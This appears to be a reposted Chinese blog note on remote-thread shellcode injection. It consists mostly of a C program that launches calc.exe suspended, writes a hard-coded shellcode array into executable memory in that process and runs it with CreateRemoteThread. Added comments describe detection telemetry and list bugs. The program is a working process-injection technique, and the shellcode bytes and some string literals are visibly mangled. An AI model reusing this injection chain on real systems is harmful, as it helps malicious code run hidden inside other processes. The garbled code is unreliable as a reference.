• 远程线程注入shellcode笔记


    #include "stdafx.h"
    #include <windows.h>
    #include <stdio.h>
    
    /*
     * Payload bytes the article injects into the victim process. Kept as a mutable
     * global so injection() can take its address and its sizeof; note that
     * sizeof(shellcode) already includes the string literal's terminating NUL.
     *
     * NOTE(review): the literal as reproduced on this page appears mangled by the
     * page extraction (the same extraction broke the printf literals further down),
     * so its bytes should not be read as authoritative.
     *
     * Defender note: a hard-coded byte string like this is what static scanning
     * (AV signatures, YARA) keys on; the RWX allocation and remote thread in
     * injection() are what behavioural telemetry keys on.
     */
    char shellcode[] = "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"
    		"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"
    		"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"
    		"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"
    		"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"
    		"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"
    		"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"
    		"x49x0bx31xc0x51x50xffxd7";
    
    
    /*
     * Demonstrates the textbook "start suspended -> allocate RWX -> write -> remote
     * thread" injection chain against calc.exe from the system directory.
     *
     * Return value: bRet, which is initialised to FALSE and never set to TRUE, so the
     * function reports failure on every path and callers cannot distinguish success
     * from failure.
     *
     * Resource handling: pi.hProcess, pi.hThread and hThread are never passed to
     * CloseHandle, and the early returns after CreateProcess succeeds leave the
     * suspended victim process alive.
     *
     * Detection notes (defender stance): CreateProcess with CREATE_SUSPENDED followed
     * by VirtualAllocEx(PAGE_EXECUTE_READWRITE), WriteProcessMemory and
     * CreateRemoteThread into another process is a well-known telemetry pattern
     * (e.g. Sysmon's CreateRemoteThread event, EDR cross-process memory-write alerts).
     */
    BOOL injection()
    {
    	/* Wide buffer, but GetSystemDirectory/_tcscat/CreateProcess are the TCHAR-generic
    	 * names: this only type-checks when the project is built with UNICODE/_UNICODE. */
    	wchar_t Cappname[MAX_PATH] = {0};
    	STARTUPINFO si;
    	PROCESS_INFORMATION pi;
    	LPVOID lpMalwareBaseAddr;
    	LPVOID lpnewVictimBaseAddr;
    	HANDLE hThread;
    	DWORD dwExitCode;
    	BOOL bRet = FALSE;   /* never changed below */
    
    	/* Source of the copy: the global payload array. */
    	lpMalwareBaseAddr = shellcode;
    
    	/* Build the path of the calculator that will be started as the victim.
    	 * The GetSystemDirectory return value (0 on failure) is not checked and the
    	 * concatenation is unbounded. NOTE(review): the "\calc.exe" literal as shown
    	 * here looks mangled by the page extraction. */
    	GetSystemDirectory(Cappname,MAX_PATH);
    	_tcscat(Cappname,L"\calc.exe");
    	/* %S prints a wide string through the narrow printf (MSVC extension).
    	 * NOTE(review): the literal is split across a raw line break on this page,
    	 * presumably an extraction artifact; as shown it does not compile. */
    	printf("Injection program Name:%S
    ",Cappname);
    
    	ZeroMemory(&si,sizeof(si));
    	si.cb = sizeof(si);
    	ZeroMemory(&pi,sizeof(pi));
    
    	/* Start the calculator with its primary thread suspended; it is never resumed. */
    	if (CreateProcess(Cappname,NULL,NULL,NULL,
    		FALSE,CREATE_SUSPENDED
    		,NULL,NULL,&si,&pi) == 0)
    	{
    		return bRet;
    	}
    
    	/* Reserve and commit a writable+executable region in the victim.
    	 * sizeof(shellcode) already includes the literal's NUL; the +1 is an extra byte. */
    	lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
    		,NULL,sizeof(shellcode)+1,MEM_COMMIT|MEM_RESERVE,
    		PAGE_EXECUTE_READWRITE);
    
    	if (lpnewVictimBaseAddr == NULL)
    	{
    		/* Leaves the suspended process running and its handles open. */
    		return bRet;
    	}
    
    	/* Copy the payload into the victim. Copying sizeof(shellcode)+1 bytes reads one
    	 * byte past the end of the shellcode array (out-of-bounds read); the BOOL result
    	 * and bytes-written count are ignored. */
    	WriteProcessMemory(pi.hProcess,lpnewVictimBaseAddr,
    		(LPVOID)lpMalwareBaseAddr,sizeof(shellcode)+1,NULL);
    
    	/* Run the copied bytes on a new thread in the victim. hThread is never checked
    	 * for NULL and never closed. */
    	hThread = CreateRemoteThread(pi.hProcess,0,0,
    		(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr,NULL,0,NULL);
    
    	/* Waits on the victim's suspended primary thread, not on hThread; that handle is
    	 * only signalled once the process terminates, so this presumably relies on the
    	 * payload ending the process (TODO confirm). */
    	WaitForSingleObject(pi.hThread,INFINITE);
    	/* Exit code is fetched but never used. */
    	GetExitCodeProcess(pi.hProcess,&dwExitCode);
    	TerminateProcess(pi.hProcess,0);
    	return bRet;
    }
    
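    /*
     * Print the one-line usage banner to stdout.
     *
     * proc: program name (normally argv[0]) shown in front of the message. A NULL
     *       proc is printed as "(unknown)" rather than being passed to "%s", which
     *       would be undefined behaviour.
     *
     * The original literal's "\n" had been turned into a raw line break by the page
     * extraction, which does not compile; the escape is restored here.
     */
    void help(char* proc)
    {
    	const char *name = proc ? proc : "(unknown)";
    	printf("%s:[-] start a process and injection shellcode to memory\n", name);
    }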
    
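    /*
     * Entry point: print the banner, then run the injection demo.
     *
     * argv[0] may be NULL when argc == 0 (permitted by the C standard), so a fallback
     * name is passed to help() in that case. injection() always returns FALSE (its
     * bRet is never set), so its result is deliberately not used as the exit status.
     */
    int main(int argc,char* argv[])
    {
    	help(argc > 0 ? argv[0] : "(unknown)");
    	(void)injection();
    	return 0;
    }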
    

     

  • 原文地址:https://www.cnblogs.com/killbit/p/5971446.html